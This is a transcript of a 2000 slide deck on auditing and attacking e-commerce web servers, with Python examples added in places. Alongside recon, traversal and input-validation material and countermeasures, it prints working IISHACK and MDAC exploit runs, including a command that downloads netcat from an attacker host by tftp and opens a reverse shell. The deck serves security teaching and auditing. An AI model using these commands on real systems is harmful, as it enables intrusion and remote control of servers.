Audit and Security of E-Commerce

Upload: have-a-nice-day-111411

Post on 14-Apr-2018


TRANSCRIPT

  • 7/30/2019 AUDIT AND SECURITY OF E-COMMERCE

    1/93

    Copyright 2000 Foundstone, Inc.

    Audit and Security of E-Commerce

    The attacks are going up the stack.

    2/93

    Audit and Security of E-Commerce

    Stuart McClure

    President/CTO

    Foundstone, Inc.

    http://www.foundstone.com

    [email protected]

    949-367-1743

    3/93

    Background

    President/CTO of Foundstone, Inc.

    Over 10 years in IT and security

    Lead author of Hacking Exposed

    Digital Battlefield columnist

    InfoWorld Security Watch columnist

    Former E&Y Security Consultant

    InfoWorld product analyst

    4/93

    Overview

    eCommerce Primer

    Information gathering

    Viewing Source

    Application design

    File System Traversal

    Input Validation

    Impersonation

    5/93

    Ecommerce Primer

    "We're secure, we have a firewall."

    6/93

    eCommerce Primer

    E-commerce is built on web traffic (TCP port 80, and 443 for SSL), which must be allowed through the e-commerce firewall. Firewalls therefore cannot block most of these attacks.

    To hack in this untamed world, knowledge of HTML, DHTML, VBScript, JScript, Java, JavaScript, Perl, CGI, Apache, IIS, ColdFusion, CyberCash, ADO, MS Access, MDAC, MS SQL Server, and Oracle is helpful and often required.

    7/93

    Ecommerce Primer

    ASCII hex values: learn them, know them, live them

    Character          Hex   Character     Hex   Character     Hex
    Space              20    - (hyphen)    2D    Z             5A
    !                  21    . (period)    2E    [             5B
    " (double quote)   22    /             2F    \             5C
    #                  23    0             30    ]             5D
    $                  24    9             39    ^             5E
    %                  25    :             3A    _             5F
    &                  26    ;             3B    ` (backtick)  60
    ' (apostrophe)     27    <             3C    a             61
    (                  28    =             3D    z             7A
    )                  29    >             3E    {             7B
    *                  2A    ?             3F    |             7C
    +                  2B    @             40    }             7D
    , (comma)          2C    A             41    ~             7E

    8/93

    eCommerce Primer

    Most attackers look for the low-hanging fruit first. They scan for web ports, search for vulnerable software or scripts, and then attack.

    The more sophisticated attacks require an in-depth knowledge of the inner workings of web scripts (all of which can be learned).

    9/93

    Information Gathering

    Gather as much information about a site as possible to understand its purpose, function, and most important, its design.

    Determine if any low-hanging fruit is available for picking.

    10/93

    Information Gathering

    Methodology

    Web reconnaissance

    Vulnerability scanning

    Site duplication

    Keyword searching

    Email addresses

    External linkage

    Commented code

    Key field enumeration

    Scripting language enumeration

    11/93

    Information Gathering

    Web reconnaissance

    Enumerate a web server searching for every web application, including alternate management servers, transaction applications, certificate servers, etc.

    Port scanning and enumeration will reveal volumes about the target systems.

    12/93

    Information Gathering

    Web reconnaissance

    Port scanning

    TCP and UDP ports 1-65535

    Common web ports: 80, 81, 88, 443, 2301, 2779, 8000, 8001, 8080, etc.

    13/93

    Information Gathering

    Web reconnaissance

    Port scanning

    Network Mapper (nmap) by Fyodor (http://www.insecure.org)

    [/opt]# nmap -sT -n -P0 -p 80,88,8000,2779 192.168.51.210

    Starting nmap V. 2.12 by Fyodor ([email protected])
    Interesting ports on (192.168.51.210):
    Port     State   Protocol  Service
    2779     open    tcp       unknown
    14/93

    Information Gathering

    Web reconnaissance

    Port scanning

    SuperScan by Robin Keir (www.keir.net)

    15/93

    Information Gathering

    Web reconnaissance

    Enumeration

    Web server vendor and version

    Web server directory structure

    SSL web server vendor and version

    Web mind meld

    16/93

    Information Gathering

    Web reconnaissance

    Enumeration

    Netcat by Hobbit (http://www.l0pht.com/~weld)

    The Swiss Army knife of hackers

    TCP (both NT and Unix) and UDP (Unix only)

    Raw TCP or UDP connection

    Command/shell/program execution

    Source routing

    Port redirector

    Telnet server

    Port scanner

    17/93

    Information Gathering

    Web reconnaissance

    Enumeration

    Web server vendor and version: Netcat (nc)

    [/opt]# nc 192.168.51.210 2779
    HEAD / HTTP/1.0

    HTTP/1.1 403 Access Forbidden
    Server: Microsoft-IIS/5.0
    Date: Sat, 26 Feb 2000 01:06:03 GMT
    Content-Length: 3286
    Content-Type: text/html

    18/93

    Information Gathering

    Web reconnaissance

    Enumeration

    Grinder 1.1 by Rhino9

    19/93

    Information Gathering

    Web reconnaissance

    Enumeration

    Hidden redirection: using HTTP-EQUIV (a META refresh in the page), web sites redirect visitors to other parts of the server or to other servers. An attacker can glean this information and use the newly discovered hosts as targets for an attack.

    20/93

    Information Gathering

    Web reconnaissance

    Enumeration

    Netcat (nc): HTTP-EQUIV discovery

    C:\>nc www.site.com 80
    GET / HTTP/1.0

    HTTP/1.1 200 OK
    Date: Sun, 27 Feb 2000 23:21:52 GMT
    Server: Microsoft-IIS/5.0
    Connection: close
    Content-Type: text/html
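The banner grab and HTTP-EQUIV discovery described on the last few slides, done offline in Python as an added example (this code is not from the Foundstone deck). It parses a raw response exactly as netcat shows it, pulls the Server header, and extracts every redirect target, whether a Location header or a META refresh, so hosts other than the one queried can be added to the target list. The response bytes are constructed for the example and the host secure.example.test is made up.

```python
"""Banner grab and hidden-redirect discovery on a captured HTTP response."""
import re
from urllib.parse import urlsplit, urljoin

# Constructed response: the header block mirrors the netcat output on the
# slide, the body is invented to carry a META refresh to a second server.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Sun, 27 Feb 2000 23:21:52 GMT\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><head>\n"
    b'<META HTTP-EQUIV="Refresh" CONTENT="0; URL=https://secure.example.test/login.asp">\n'
    b"</head><body>moved</body></html>\n"
)

# <meta http-equiv="refresh" content="N; url=TARGET">, any case, any quoting
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv\s*=\s*["\']?refresh["\']?[^>]*'
    r'content\s*=\s*["\']\s*\d+\s*;\s*url\s*=\s*([^"\'>\s]+)',
    re.IGNORECASE,
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return status, headers, body.decode("latin-1", "replace")


def server_banner(raw):
    """The Server header, i.e. what 'HEAD / HTTP/1.0' over netcat is after."""
    return parse_response(raw)[1].get("server", "")


def redirect_targets(base_url, raw):
    """Every redirect target (Location header or META refresh) as an absolute URL."""
    _, headers, body = parse_response(raw)
    targets = []
    if "location" in headers:
        targets.append(urljoin(base_url, headers["location"]))
    for match in META_REFRESH.finditer(body):
        targets.append(urljoin(base_url, match.group(1)))
    return targets


def new_hosts(base_url, raw):
    """Hosts named by redirects that differ from the host we connected to."""
    base_host = urlsplit(base_url).hostname
    return sorted({urlsplit(t).hostname for t in redirect_targets(base_url, raw)
                   if urlsplit(t).hostname != base_host})


if __name__ == "__main__":
    print("Server:", server_banner(SAMPLE_RESPONSE))
    print("Redirects:", redirect_targets("http://www.site.com/", SAMPLE_RESPONSE))
    print("New hosts:", new_hosts("http://www.site.com/", SAMPLE_RESPONSE))
```

Feeding it the bytes read back from `nc host 80` after a `GET / HTTP/1.0` gives the same result as reading the HTML by eye; the point of automating it is that the META refresh is easy to miss in a long page and the Location header is never shown by a browser.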

    21/93

    Information Gathering

    Web reconnaissance

    Enumeration

    Secure Sockets Layer (SSL): privacy protocol combining symmetric-key encryption (DES, RC4), authentication (RSA, DSS), and message integrity (MD5- and SHA-based MACs).

    Transport Layer Security (TLS) is the successor to SSL 3.0.

    OpenSSL/SSLeay: an open source toolkit for implementing SSL and TLS in applications.

    22/93

    Information Gathering

    Web reconnaissance

    Enumeration

    OpenSSL/SSLeay

    SSLeay> s_client -connect www.ramsec.com:443
    CONNECTED(00000003)
    HEAD / HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/4.0
    Content-Location: http://216.182.36.154/index.html
    Date: Sat, 26 Feb 2000 00:59:07 GMT
    Last-Modified: Thu, 10 Feb 2000 22:52:52 GMT
    read:errno=0

    Note the Content-Location header: IIS 4.0 fills it with the server's own IP address, so an address that is normally hidden behind a hostname, load balancer or NAT is disclosed to anyone who asks.

    23/93

    Information Gathering

    Vulnerability checking

    Web vulnerability scanners check for known holes in application files and design:

    CGIscan by Bronc Buster (1998)

    Sitescan by Rhino9

    Whisker by Rain Forest Puppy (1999), http://www.wiretrip.net/rfp

    24/93

    Information Gathering

    Vulnerability checking

    Whisker (NT and Unix)

    -- whisker / v1.3.0a / rain forest puppy / ADM / wiretrip --
    - Loaded script database of 1691 lines
    = - = - = - = - = - =
    = Host: www.hackingexposed.com
    = Server: Apache/3.3.3 (Unix)
    + 404 Not Found: GET /cfdocs/
    + 404 Not Found: GET /cfide/Administrator/startstop.html
    + 404 Not Found: GET /cfappman/index.cfm
    + 403 Forbidden: GET /cgi-bin/
    + 404 Not Found: GET /cgi-bin/dbmlparser.exe
    + 404 Not Found: HEAD /cgi-bin/webdist.cgi
    + 404 Not Found: HEAD /cgi-bin/handler
    + 404 Not Found: HEAD /mall_log_files/order.log
    + 404 Not Found: HEAD /PDG_Cart/
    + 404 Not Found: HEAD /quikstore.cfg
    + 404 Not Found: HEAD /orders/
    + 404 Not Found: HEAD /Admin_files/order.log
    + 404 Not Found: HEAD /bigconf.cgi

    25/93

    Information Gathering

    Site duplication: web spider programs

    Automatic web retriever and mirroring programs that follow every link, copying readable files such as .HTM, .HTML, .DHTML, .JHTML, .SHTML, .XML, etc.

    They do not retrieve the source of .CGI, .ASP or .CFM scripts or of other dynamically generated pages, only the HTML those scripts emit.

    Manual searching: View Source, Save As

    26/93

    Information Gathering

    Site duplication

    Wget: Unix based, GNU Wget 1.5.3

    Standard on most Linux distributions, or download from http://www.freshmeat.org

    Non-interactive network retriever

    HTTP and FTP retrieval

    Proxy support

    Authentication support

    Include/exclude list of URLs

    27/93

    Information Gathering

    Wget

    [/opt]# wget -r -m -v www.ramsec.com

    --13:33:34--  http://www.ramsec.com:80/
               => `www.ramsec.com/index.html'
    Connecting to www.ramsec.com:80... connected!
    HTTP request sent, awaiting response... 200 OK
    Length: 11,731 [text/html]

        0K -> .......... .                                     [100%]

    13:33:35 (25.57 KB/s) - `www.ramsec.com/index.html' saved [11731/11731]
    28/93

    Information Gathering

    Site duplication: Teleport Pro 1.29 by Tennyson Maxwell Information Systems, Inc. (http://www.tenmax.com)

    Proxy support

    Authentication support

    Multi-threaded

    Advanced filters
    29/93

    Information Gathering

    Teleport Pro results:

    30/93

    Information Gathering

    Site duplication: countermeasures

    Garbage.cgi

    Rootshell once had an obscure link on its initial page which ran a CGI script that spat out an endless stream of data. A spider that follows every link gets stuck on it, which effectively tied up the web pilfering.

    31/93

    Information Gathering

    Keyword searching

    Searching web site code to find hidden treasures such as usernames, passwords, email addresses, external links, external images, etc.

    32/93

    Information Gathering

    Keyword searching

    With wget on Unix:
    grep -i pass *.html

    With Teleport Pro on NT:
    findstr /i pass *.html

    33/93

    Information Gathering

    Email address

    Searching a web site for email addresses can unearth usernames, external relationships, and points of attack.

    34/93

    Information Gathering

    Email addresses

    Wget (offline)

    Teleport Pro (offline)

    Sam Spade (http://www.samspade.org): whois, ping, traceroute, ARIN, SMTP, finger, etc., plus an online "crawl website" function!

    BlackWidow by SoftByteLabs.com

    35/93

    Information Gathering

    Email addresses: wget

    [/opt]# grep @ *.html
    index.html: For additional information, contact: [email protected]
    index.html: HREF="mailto:[email protected]">webmaster@ramsec.com

    36/93

    Information Gathering

    Email addresses: Teleport Pro

    D:\>findstr "@" *.htm?
    about_us.html: HREF="mailto:[email protected]">[email protected]&nbsp;

    37/93

    Information Gathering

    Email addresses

    Sam Spade

    38/93

    Information Gathering

    Email addresses

    Black Widow

    39/93

    Information Gathering

    External linkage

    Links to web pages or graphics on systems other than the target.

    An external link can imply a relationship of sorts and provide alternate targets for the attacker.

    40/93

    Information Gathering

    External linkage

    Sam Spade

    41/93

    Information Gathering

    Commented code

    Searching for commented code can provide insight into the site's design, such as applications, languages used, programming hints, etc.

    42/93

    Information Gathering

    Commented code

    Manual technique is most effective
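The keyword, email, external-link and commented-code passes of the preceding slides, combined into one offline walk over a mirrored site, as an added example (not code from the Foundstone deck). It does in one pass what the grep/findstr one-liners do separately. The two HTML files in MIRROR are constructed for the example, as are the hosts partner.example.test and ads.example.test and the assumed target host www.site.com.

```python
"""Search a mirrored site (wget/Teleport Pro output) for leaked detail."""
import re
from urllib.parse import urlsplit

TARGET_HOST = "www.site.com"   # assumed: the host that was mirrored

# Constructed mirror, {relative path: file contents}; a real run would read
# the files wget or Teleport Pro saved to disk.
MIRROR = {
    "index.html": """<html><body>
<!-- TODO: remove before launch: db user 'shop' on sql1, script in /cgi-bin/order.pl -->
<a href="http://www.site.com/catalog.asp">Catalog</a>
<a href="http://partner.example.test/track.cgi">Track order</a>
<img src="http://ads.example.test/banner.gif">
Questions? <a href="mailto:webmaster@site.com">webmaster@site.com</a>
</body></html>""",
    "login.html": """<form action="/cgi-bin/login.cgi" method="post">
<input type="hidden" name="passwd_hint" value="default is 'changeme'">
<input name="user"><input type="password" name="password">
</form>""",
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
LINK_RE = re.compile(r"""(?:href|src)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
KEYWORDS = ("pass", "user", "admin", "sql", "key")   # the 'grep pass' list, extended


def emails(mirror):
    """Distinct email addresses anywhere in the mirror (mailto: links included)."""
    return sorted({m for html in mirror.values() for m in EMAIL_RE.findall(html)})


def comments(mirror):
    """(path, comment text) for every HTML comment; developers leave hints here."""
    return [(path, c.strip()) for path, html in mirror.items()
            for c in COMMENT_RE.findall(html)]


def external_hosts(mirror, target_host=TARGET_HOST):
    """Hosts other than the target that pages link to or load images from."""
    hosts = set()
    for html in mirror.values():
        for url in LINK_RE.findall(html):
            host = urlsplit(url).hostname        # None for relative and mailto: URLs
            if host and host != target_host:
                hosts.add(host)
    return sorted(hosts)


def keyword_hits(mirror, keywords=KEYWORDS):
    """(path, line number, line) for each line containing a keyword, case-insensitively."""
    hits = []
    for path, html in mirror.items():
        for n, line in enumerate(html.splitlines(), 1):
            if any(k in line.lower() for k in keywords):
                hits.append((path, n, line.strip()))
    return hits


if __name__ == "__main__":
    print("emails:", emails(MIRROR))
    print("external hosts:", external_hosts(MIRROR))
    for path, text in comments(MIRROR):
        print("comment in", path + ":", text)
    for path, n, line in keyword_hits(MIRROR):
        print("%s:%d: %s" % (path, n, line))
```

To run it against a real mirror, build MIRROR by walking the download directory and reading each .htm/.html file; everything else stays the same.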


    44/93

    Information Gathering

    Key field enumeration

    Learn the name and type of key fields used in dynamic scripts (.CGI, .ASP, .CFM).

    http://www.site.com/Login.asp?id=486&fu=http%3A%2F%2Fwww%2ESramsec%2Ecom%2Fdirectory%2FDefault%2Easp&cw=100&sf=0&kv=1&cc=9442568&Oi=1

    id, fu, cw, sf, kv, cc, Oi are input fields to the Login.asp script (fu decodes to http://www.Sramsec.com/directory/Default.asp).
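Key field enumeration on the Login.asp URL above, as an added example (not from the Foundstone deck): list the parameter names, decode the URL-encoded values, and tag each field with a rough type so the tester knows which ones carry a URL or path worth tampering with and which ones change between captures. The type labels and the second, varied URL are this example's own constructions.

```python
"""Enumerate and classify the input fields of a dynamic script from captured URLs."""
from urllib.parse import urlsplit, parse_qsl

# The URL shown on the slide.
SAMPLE_URL = ("http://www.site.com/Login.asp?id=486&fu=http%3A%2F%2Fwww%2ESramsec%2Ecom"
              "%2Fdirectory%2FDefault%2Easp&cw=100&sf=0&kv=1&cc=9442568&Oi=1")
# Constructed: the same script captured for a second session.
SECOND_CAPTURE = ("http://www.site.com/Login.asp?id=487&fu=http%3A%2F%2Fwww%2ESramsec%2Ecom"
                  "%2Fdirectory%2FDefault%2Easp&cw=100&sf=0&kv=1&cc=9442569&Oi=1")


def fields(url):
    """Ordered (name, decoded value) pairs; blank values are kept so empty fields still show."""
    return parse_qsl(urlsplit(url).query, keep_blank_values=True)


def classify(value):
    """Heuristic type label used to prioritise fields for testing (example's own scheme)."""
    if value == "":
        return "empty"
    if value.isdigit():
        return "integer"
    if value.lower().startswith(("http://", "https://", "/", "..")):
        return "url/path"      # candidate for redirect or file-include tests
    return "string"


def enumerate_fields(url):
    """(name, decoded value, type) for every field of the script."""
    return [(name, value, classify(value)) for name, value in fields(url)]


def changed_fields(url_a, url_b):
    """Names whose values differ between two captures: likely per-user or per-session state."""
    a, b = dict(fields(url_a)), dict(fields(url_b))
    return sorted(n for n in a if a.get(n) != b.get(n))


if __name__ == "__main__":
    for name, value, kind in enumerate_fields(SAMPLE_URL):
        print("%-3s %-9s %s" % (name, kind, value))
    print("varies per session:", changed_fields(SAMPLE_URL, SECOND_CAPTURE))
```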

    46/93

    Information Gathering

    Scripting language enumeration

    47/93

    Viewing Source

    Numerous bugs or poor web designs allow an attacker to view web source code; for example, .ASP or .CGI code can be viewed within the browser.

    An attacker can discover internal web design or, worse, internally used usernames and passwords for database access.

    48/93

    Viewing Source

    Methodology

    Active Server Pages (ASP)

    Common Gateway Interface (CGI)

    ColdFusion Server (CFM)


    50/93

    Viewing Source

    ASP vulnerabilities

    Dot bug (IIS 3.0 returned the source of an .ASP page when a trailing period was appended to its URL)

    Countermeasures

    Upgrade to IIS 4.0 or above

    Apply the IIS 3.0 patch: ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/fesrc-fix


    52/93

    Viewing Source

    ASP vulnerabilities: Alternate Data Streams bug (appending ::$DATA to an .ASP URL returned the page's source)

    Countermeasures

    Remove read access on files for the Everyone group

    Apply patches

    For IIS 3.0: ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/iis3-datafix/

    For IIS 4.0: ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security

    53/93

    Viewing Source

    Common Gateway Interface (CGI): CGI design flaws

    CGIs that read and display an HTML file can be tricked into reading themselves and therefore displaying their own contents.

    http://www.site.com/index.cgi?page=main.html

    can be changed to:

    http://www.site.com/index.cgi?page=index.cgi

    54/93

    Viewing Source

    ColdFusion Server by Allaire (www.allaire.com)

    Numerous bugs in 4.0 (1999), in the sample applications shipped under /cfdocs:

    Upload a file onto the web server:
    http://www.site.com/cfdocs/expeval/openfile.cfm

    View a file on the web server with the Expression Evaluator:
    http://www.site.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log

    55/93

    Viewing Source

    ColdFusion Server

    Countermeasures

    Remove the scripts from the web server

    Apply the patch: http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full

    56/93

    File System Traversal

    Vulnerabilities and misconfigurations may allow unauthorized access to files and directories on the web server.

    57/93

    File System Traversal

    Methodology

    Dot dot bugs

    Dot listings

    Tilde usage

    Compaq Insight Manager


    59/93

    File System Traversal

    Dot listings

    Web server misconfiguration or vulnerability which allows an attacker to display the current directory's file listing.

    For example, Novell's GroupWise Web Gateway web server lists a virtual directory when it is requested with a trailing dot:

    http://www.infoworld.com/us/.

    60/93

    File System Traversal

    Tilde usage

    Web server vulnerability allowing an attacker to escape the root directory of the web server and view the contents of a particular user's home directory on the system.

    For example, the following might display the contents of the root user's directory:

    http://www.infoworld.com/~root/

    61/93

    File System Traversal

    Compaq Insight Manager (CIM)

    Re-discovered in 1999

    The CIM web server allowed an attacker to exploit the dot dot (../) sequence in a browser to download any file on the system.

    A good test to determine if a system is vulnerable is to look for C:\BOOT.INI.
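The index.cgi?page= flaw from the Viewing Source section and the dot dot traversal of this section are the same bug seen from two sides: a script opens whatever filename the client supplies. The added example below (not code from the Foundstone deck) shows a handler with that bug beside a hardened one that resolves the path and refuses anything outside the document root or anything that is not a static page. The mini web root, its files and the boot.ini placed outside it are constructed in a temporary directory.

```python
"""File include / directory traversal: the vulnerable handler and the fix."""
import os
import tempfile


def build_webroot():
    """Constructed layout: <tmp>/www/{index.cgi,main.html} with <tmp>/boot.ini outside the root."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "www")
    os.mkdir(root)
    with open(os.path.join(root, "main.html"), "w") as f:
        f.write("<h1>main</h1>")
    with open(os.path.join(root, "index.cgi"), "w") as f:
        f.write("#!/usr/bin/perl\n$dbpass='s3cret';   # the kind of thing source disclosure leaks\n")
    with open(os.path.join(base, "boot.ini"), "w") as f:
        f.write("[boot loader]\n")
    return root


def serve_page_vulnerable(root, page):
    """Trusts the page= parameter completely, like the index.cgi on the slide:
    page=index.cgi returns the script's own source, page=../boot.ini leaves the root."""
    with open(os.path.join(root, page)) as f:
        return f.read()


def is_allowed(root, page):
    """Containment check used by the fixed handler: (ok, reason)."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, page))   # collapses ../ and symlinks
    # The resolved path must still be under the document root...
    if os.path.commonpath([root, target]) != root:
        return False, "path escapes web root"
    # ...and only static pages may be rendered, never scripts or config.
    if not target.endswith(".html"):
        return False, "not a renderable page"
    return True, "ok"


def serve_page_safe(root, page):
    """Fixed handler: refuses anything is_allowed() rejects."""
    ok, reason = is_allowed(root, page)
    if not ok:
        raise PermissionError(reason)
    with open(os.path.realpath(os.path.join(root, page))) as f:
        return f.read()


if __name__ == "__main__":
    root = build_webroot()
    print(serve_page_vulnerable(root, "index.cgi"))      # leaks the script
    print(serve_page_vulnerable(root, "../boot.ini"))    # leaves the web root
    for p in ("main.html", "index.cgi", "../boot.ini"):
        print(p, "->", is_allowed(root, p))
```

Checking for "../" in the string is not enough: encoded forms (%2e%2e/), absolute paths and symlinks all get past a substring test, which is why the check works on the resolved path rather than on the parameter text.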

    62/93

    Input Validation

    Web applications can often be tricked into accepting invalid input for processing, making them cough up sensitive information or, worse, crashing the application.

    63/93

    Input Validation

    Methodology

    Metacharacters

    Field overflows

    Application buffer overflows

    Hex character replacement

    Server side includes (SSI)

    Hidden tags

    Server side debugging

    Extending JavaScript

    Data access bypassing

    Local command execution

    64/93

    Input Validation

    Metacharacters

    Depending on the input sanitation being performed on the server, it may be possible to submit metacharacters as a parameter and get the server to return unexpected results. For example:

    http://www.site.com/login.cgi?..&&&&&&&&&

    may actually choke the web server or produce debugging information.
    65/93

    Input Validation

    Field overflows

    Poor field length checking may allow an attacker to submit a large character field, causing unexpected results or sometimes crashing the server (use with caution).

    66/93

    Input Validation

    Field overflows

    Hidden tag SIZE

    67/93

    Input Validation

    Field overflows

    Hidden tag SUBMIT

    68/93

    Input Validation

    Field overflows

    Unexpected results


    70/93

    Input Validation

    Application buffer overflows

    IISHACK

    iishack.exe (program containing the buffer overflow and initial instructions to download the ncx.exe file to be executed).

    ncx.exe (slim version of Netcat executing a command shell on port 80).

    71/93

    Input Validation

    Application buffer overflows: IISHACK (how to exploit)

    Set up a web server with ncx.exe in the root directory.

    Run iishack.exe:
    C:\NT\>iishack 192.168.51.1 80 10.1.1.1/ncx.exe

    Connect to port 80 on the target:
    C:\NT\>nc 192.168.51.1 80
    Microsoft(R) Windows NT(TM)
    (C) Copyright 1985-1996 Microsoft Corp.

    C:\WINNT\>

    72/93

    Input Validation

    Application buffer overflows

    IISHACK countermeasure

    Apply the IIS 4.0 patch: ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/ext-fix/

    73/93

    Input Validation

    Hex character replacement

    Replacing ASCII characters with their hexadecimal (%XX) equivalents can bypass some IDSs looking for key strings, and it may bypass initial script parsing for invalid or escape characters such as the backtick (` or %60) and ampersand (& or %26), allowing an attacker to execute commands locally and/or receive back unexpected results.
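The ASCII hex table from the primer and the hex replacement trick above, worked through in Python as an added example (not code from the Foundstone deck). It generates the table, percent-encodes a string, shows a filter that looks for a literal backtick and is fooled by %60, and then the corrected filter, which decodes exactly once and rejects anything still encoded, so neither %60 nor the double-encoded %2560 gets through. The metacharacter set is this example's choice.

```python
"""Percent (hex) encoding and why a filter must decode before it matches."""
from urllib.parse import unquote


def ascii_hex_table():
    """{character: 'XX'} for printable ASCII 0x20-0x7E, as on the primer slide."""
    return {chr(c): "%02X" % c for c in range(0x20, 0x7F)}


def encode(s, keep="-._~"):
    """Percent-encode every character except letters, digits and the unreserved set (ASCII input)."""
    return "".join(c if c.isalnum() or c in keep else "%%%02X" % ord(c) for c in s)


# Shell and SSI metacharacters this example treats as dangerous in a parameter.
DANGEROUS = set("`&;|$<>\\\n")


def naive_filter(param):
    """Matches literal metacharacters in the raw parameter: %60 sails through."""
    return not (set(param) & DANGEROUS)


def canonical_filter(param):
    """Decode exactly once, then reject metacharacters and any leftover '%'."""
    decoded = unquote(param)
    if "%" in decoded:          # double-encoded input (%2560 -> %60) is rejected outright
        return False
    return not (set(decoded) & DANGEROUS)


if __name__ == "__main__":
    table = ascii_hex_table()
    print("backtick:", table["`"], "ampersand:", table["&"])
    print(encode("user`id`"))
    for p in ("user`id`", "user%60id%60", "user%2560id"):
        print("%-14s naive=%-5s canonical=%s" % (p, naive_filter(p), canonical_filter(p)))
```

Decoding once and refusing what is still encoded is the simplest canonicalisation rule; decoding in a loop until nothing changes is the alternative, but then the filter has to run on the fully decoded value and nowhere else.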


    75/93

    Input Validation

    Server side includes (SSI)

    Allow commands to be executed locally on the system.

    For example, on a Unix web server allowing SSIs you can use the following command to mail /etc/passwd to yourself:

    76/93

    Input Validation

    Hidden tags

    HTML hidden form fields are frequently used to store session information such as price, quantity, and purchased item.

    These hidden fields can be modified and resubmitted. If no backend checking is performed, a product can be purchased for a much reduced price (e.g. a BMW for the cost of a matchbox car).
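The hidden-field purchase above and its two fixes, as an added example (not code from the Foundstone deck): a checkout that totals whatever price the form carries, the corrected checkout that ignores the client's price and looks it up by SKU, and, for state that really must round-trip through the client, fields signed with an HMAC under a key only the server holds. The catalog, key and forms are constructed; the field-overflow slides apply the same lesson, since MAXLENGTH and hidden fields are enforced by the browser only.

```python
"""Hidden form fields: client-supplied price vs server-side lookup vs signed fields."""
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

CATALOG = {"BMW-Z3": 4_500_000, "MATCHBOX-BMW": 299}   # constructed: SKU -> price in cents
SERVER_KEY = b"constructed-demo-key-do-not-reuse"      # constructed: never leaves the server


def checkout_trusting_form(form):
    """Vulnerable: total computed from the hidden price the client sent back."""
    return int(form["qty"]) * int(form["price"])


def checkout_server_side(form):
    """Fixed: price comes from the catalog by SKU; any price field in the form is ignored."""
    return int(form["qty"]) * CATALOG[form["sku"]]


def sign_fields(fields):
    """Serialize fields deterministically and append an HMAC-SHA256 tag."""
    body = urlencode(sorted(fields.items()))
    tag = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return body + "&sig=" + tag


def verify_fields(blob):
    """Return the fields if the tag verifies, else None (constant-time comparison)."""
    body, sep, tag = blob.rpartition("&sig=")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return dict(parse_qsl(body))


if __name__ == "__main__":
    honest = {"sku": "BMW-Z3", "qty": "1", "price": "4500000"}
    tampered = dict(honest, price="299")          # edited hidden field, resubmitted
    print("trusting form, tampered:", checkout_trusting_form(tampered))
    print("server-side lookup, tampered:", checkout_server_side(tampered))
    blob = sign_fields({"sku": "BMW-Z3", "price": "4500000"})
    print("signed fields verify:", verify_fields(blob))
    print("edited signed fields:", verify_fields(blob.replace("price=4500000", "price=299")))
```

Signing stops tampering but not replay or disclosure: a signed blob can be resubmitted unchanged and its contents are readable, so anything secret or single-use still belongs in server-side session state.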

    77/93

    Input Validation

    Server side debugging

    Server side application debugging features may allow additional information to be leaked about the script's function, e.g.:

    http://www.domain.com/cgi-bin/script.cgi?debug=ON (or debug=TRUE)

    78/93

    Input Validation

    Extending JavaScript

    Sites that allow users to input information onto the site without checking for JavaScript content can allow attackers to insert JavaScript code to prompt users for sensitive information.

    For example, a recent eBay hack was accomplished by inserting JavaScript code into the description of an auction item. When users selected the description they were prompted to enter their online user ID and password, which were sent to the attacker.

    79/93

    Input Validation

    Local command execution

    Vulnerabilities in the web server, in script parameter processing, or in rogue files may allow an attacker to execute local commands on the affected systems.

    80/93

    Input Validation

    Local command execution

    MDAC

    IIS's MDAC component (RDS, reached through msadcs.dll) has a vulnerability where an attacker can submit commands for local execution.

    Exploit (mdac.pl) written by Rain Forest Puppy (RFP)

    Exploit and fix can be found at www.wiretrip.net/rfp

    81/93

    Input Validation

    Local command execution

    MDAC: detecting vulnerable systems

    C:\>nc -nvv -w 2 192.168.51.1 80
    GET /msadc/msadcs.dll HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/4.0
    Date: Sun, 19 Dec 1999 18:32:10 GMT
    Content-Type: application/x-varg
    Content-Length: 6

    A 200 with Content-Type application/x-varg shows that msadcs.dll is present and answering; it does not by itself prove the server is unpatched.

    82/93

    Input Validation

    Local command execution

    MDAC: sending the exploit

    C:\>mdac.pl -h 192.168.51.1 -t 192.168.51.102 -i 192.168.51.102 -p 44444
    -- RDS exploit by rain forest puppy / ADM / Wiretrip --
    Command:
    cmd /c cd %SystemRoot%&&tftp -i 192.168.51.102 GET nc.exe nc.exe&&del ftptmp && attrib -r nc.exe && PROMPT=hacked $p$g&& nc.exe -e cmd.exe 192.168.51.102 44444
    Step 1: Trying raw driver to btcustmr.mdb
    winnt -> c: Success!

    83/93

    Input Validation

    Local command execution

    MDAC: getting the prompt

    C:\>nc -l -p 44444
    Microsoft(R) Windows NT(TM)
    (C) Copyright 1985-1996 Microsoft Corp.

    hacked C:\WINNT>

    84/93

    Input validation

    Local command execution

    Sambar CGI vulnerability (2/23/00)

    Batch files shipped in cgi-bin allow local command execution:

    Hello.bat

    Echo.bat

    85/93

    Input validation

    Local command execution

    Sambar hack

